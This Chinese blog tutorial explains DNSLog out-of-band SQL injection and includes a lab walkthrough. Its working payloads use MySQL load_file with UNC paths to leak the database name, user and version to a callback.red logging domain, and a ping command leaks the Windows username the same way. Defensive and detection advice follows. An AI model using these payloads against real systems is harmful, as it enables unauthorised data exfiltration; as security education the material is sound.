SQL注入—详解(4)【DNSLog注入】

已于 2025-05-19 13:04:26 修改
阅读量709 收藏 18
点赞数 22
分类专栏: 靶场搭建 网络安全 文章标签: sql 数据库 网络安全 笔记
于 2025-05-19 00:29:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_84408069/article/details/148051320
版权

一、什么是DNSLog注入?

DNS是什么?
DNS(Domain Name System,域名系统)是互联网的一项核心服务,它就像互联网世界的"电话簿",负责将人类易记的域名(如http://www.baidu.com)转换为计算机能够识别的IP地址(如14.215.177.39)。

DNSLog注入是一种利用DNS协议进行信息外泄的攻击技术,它通过构造特殊的DNS查询请求,将敏感数据嵌入到域名查询中,使攻击者能够通过监控DNS日志来获取这些数据。

DNSLog平台
http://www.dnslog.cn/
https://www.callback.red/
ceye.io/introduce

以https://www.callback.red/为例
点击获取域名,新建一个页面,访问刚刚生成的域名

在cmd中执行ping %username.+刚刚获得的域名%

点击获取结果,可以看到以下信息
在这里插入图片描述
可以看到这里可以获取到我们主机的名称19802,可以看到解析的日志会把%USERNAME% 的值给带出来,因为系统在ping命令之前会将%USERNAME% 的值解析出来,然后再和qpnf.callback.red 拼接起来。

二、DNSLog注入的工作原理

典型利用场景
显错注入(有回显点的),盲注(注入的效率低且线程高容易被waf拦截)
前提条件

  1. 数据库root权限,
  2. 数据库可读写权限, secure_file_priv 值为空
  3. 攻击目标是windows系统(因为读取远程文件就要用到UNC路径,UNC路径就是类似 \softer 这样的形式的网络路径,就是 \ 。但Linux服务器没有unc路径)

UNC实例及解读: //xclay.net/share/张三/账单.docs
如果访问上述UNC路径的话,就会得到xclay.net 服务器的share共享文件夹下的张三文件夹下的 账单.docs文件

三、靶场攻击示例

这里使用到 load_file() 函数
语法:load_file(filename),读取一个文件并将 其内容作为字符串返回。如果filename是UNC路径中主机的地址,将会进行域名解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。

  1. 注入语法: load_file(concat('//',(数据库语句),'.dnslog地址/abc'))
    注意:后面这个abc文件存不存在并不重要,随便写个文件就行,只要发生了DNS解析,我们就能看到我们所需要的东西,如这里的库名,但是这个文件必须要写,因为这是load_file函数所需
    我这里输入1' and (load_file(concat('//',(select database()),'.a1q0.callback.red/abc')))%23,大家注意看自己随机生成的dnslog是什么。

    这里我们返回平台就可以看到我们想要的数据库名啦

在这里插入图片描述
以此类推,我们输入1' and (load_file(concat('//',(select user()),'.a1q0.callback.red/abc')))%23
在这里插入图片描述
就可以看到把我们的user的名字带出来了。
输入version()
在这里插入图片描述

就可以看到我们的版本号了。

四、防御措施

  1. 输入验证与过滤:
    • 对用户输入进行严格验证
    • 过滤特殊字符和DNS查询相关关键字

  2. 网络层防护:
    • 限制出站DNS查询
    • 实施网络分段,控制DNS流量

  3. 系统加固:
    • 禁用不必要的DNS功能(如Windows的xp_dirtree)
    • 更新和修补已知漏洞

  4. 监控与检测:
    • 监控异常的DNS查询模式
    • 设置DNS查询频率阈值

  5. 安全开发实践:
    • 使用参数化查询防止SQL注入

    • 实施最小权限原则

检测DNSLog注入

  1. 日志分析:检查DNS日志中异常的查询模式
  2. 流量监控:检测包含敏感数据的DNS查询
  3. 工具辅助:使用安全工具如Burp Suite检测潜在的DNS外泄漏洞

五、总结

DNSLog注入是一种隐蔽的数据外泄技术,攻击者利用它可以在许多看似无害的场景下获取敏感信息。了解其工作原理和利用方式对于构建有效的防御策略至关重要。通过实施严格的输入验证、网络控制和持续监控,组织可以显著降低此类攻击的风险。

宇宙级免责声明

  1. 本文仅用于授权测试与教育目的,禁止用于非法渗透。
  2. 未经许可对他人系统测试可能触犯法律,后果自负。
  3. 技术研究应遵循"不伤害原则",维护网络安全生态。

🔐 合法研究途径
✅ CTF竞赛
✅ 漏洞赏金计划(如HackerOne)
✅ 企业授权渗透测试
✅ 本地靶场(如DVWA、WebGoat)

“Knowledge is power, but ethics is its compass.”
知识即力量,而道德是指南针。

26-3 SQL注入攻击 - SQL注入无回显,盲注又被封怎么办?
weixin_43263566的博客
03-11 892
UNC路径的格式类似于。基于时间的盲注可以通过构造特定的SQL语句来判断条件是否成立,从而推测出数据库中的数据。盲注速度较慢且容易被WAF或防火墙封禁IP,因此利用DNSlog可以快速有效地获取数据,避免IP被封锁的情况。通过以上步骤,可以利用 DNSLog 平台或自行部署DNSLog来获取命令执行的回显信息,这在某些情况下可能用于安全测试或网络监控等需要的场景。需要注意的是,DNS查询过程中涉及到本地DNS服务器、根DNS服务器以及顶级域名服务器等不同级别的DNS服务器,通过逐级查询最终完成域名解析。
SQL注入之DNS_log注入
weixin_47785246的博客
07-11 946
SQL注入之DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入之DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
SQL DNSlog注入详解
永远是少年
08-07 1443
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
SQL注入DnsLog注入
qq_52310755的博客
03-22 2348
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL注入详解
qq_45776114的博客
11-21 2663
SQL注入漏洞执行的主要原因就是在数据交互中,前端数据出入后台处理时,没有做严格的判断,导致传入的参数拼接到SQL语句中后,被当作SQL语句一部分执行。
SQL注入详解(万字文章详解
追光者的博客
03-12 8865
本文章仅为学习交流使用,请勿做其它用途使用,请勿触碰法律红线。
sql注入大总结【万字详解
congsec的博客
08-10 3186
SQL注入是利用程序对用户输入参数的验证不严格,在用户输入的数据中注入SQL语句代码,使其被数据库服务器误认为正常的SQL语句而执行,从而达到欺骗数据库操作的效果。
SQL注入详解(全网最全,万字长文)
热门推荐
m0_56691564的博客
10-23 4万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
SQL注入漏洞之盲注原理 sql注入 DNSLOG注入回显 详解 XFF注入 靶场练习以及案例说明哟
浩策盾悟
01-24 9770
substr()函数 substring -- sub子集 string -- 字符串 子字符串 aabbcc -- aa bb aab aabbc pikachu 从第一个位置开始取出1个字符 ascii('p')SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注.我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。如果使用了布尔盲注没有错误返回,其实还有一个盲注类型是可以尝试的那就是时间类型盲注.
SQL注入详解
一纸荒芜的博客
08-17 4346
sql注入类型与其他扩展
sql注入详解【从数据库架构分析】
congsec的博客
07-29 1848
SQL注入是一种常见的Web应用程序安全漏洞,它允许攻击者在Web应用程序中插入恶意SQL语句,从而操纵数据库执行非授权的操作。这种攻击利用了应用程序在处理用户输入时的不足,特别是当应用程序直接将用户输入作为SQL语句的一部分使用,而没有进行适当的验证和清理时。
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 1311
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
sql注入知识点
m0_55772907的博客
04-27 3854
1 Sqllab渗透测试天书 Microsoft英文文档 ORDER BY Clause (Transact-SQL) - SQL Server | Microsoft DocsSELECT - ORDER BY Clause (Transact-SQL)https://docs.microsoft.com/en-us/sql/t-sql/queries/select-order-by-clause-transact-sql?view=sql-server-ver152 Iwebsec靶场 判断字
数据库第二次作业--SQL的单表查询与多表查询
最新发布
2302_80908433的博客
05-19 190
【代码】数据库第二次作业--SQL的单表查询与多表查询。
官方 Elasticsearch SQL 和 NLPChina Elasticsearch SQL 的区别
jifgnie的博客
05-16 381
官方的可以在kibana 控制台上进行查询:POST /_sql
PostgreSQL malformed array literal异常
mojinchuan的专栏
05-15 270
PostgreSQL malformed array literal异常问题分析与处理
关于 Web 漏洞原理与利用:1. SQL 注入SQLi)
Triste__chengxi的博客
05-18 870
在绕过技巧作用原理典型例子备注编码绕过URL/Unicode/Hex编码%27 OR 1=1绕过简单字符串检测注释绕过利用 SQL 注释符截断后续语句截断后续合法语句大小写绕过混合大小写关键字绕过大小写敏感规则双写绕过重复字符、转义利用转义规则混淆检测宽字节绕过利用多字节编码字符重叠针对 GBK 等中文编码环境延时注入利用延时函数判断盲注无需报错,仅靠响应时间判断。
SQLMesh 增量模型从入门到精通:5步实现高效数据处理
neweastsun的专栏
05-16 908
本文深入解析 SQLMesh 中的增量时间范围模型,介绍其核心原理、配置方法及高级特性。通过实际案例说明如何利用该模型提升数据加载效率,降低计算资源消耗,并提供配置示例与最佳实践建议,帮助读者在实际项目中有效应用这一强大功能。
SQL里where条件的顺序影响索引使用吗?
java1234的博客
05-16 610
SQL里where条件的顺序影响索引使用吗?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值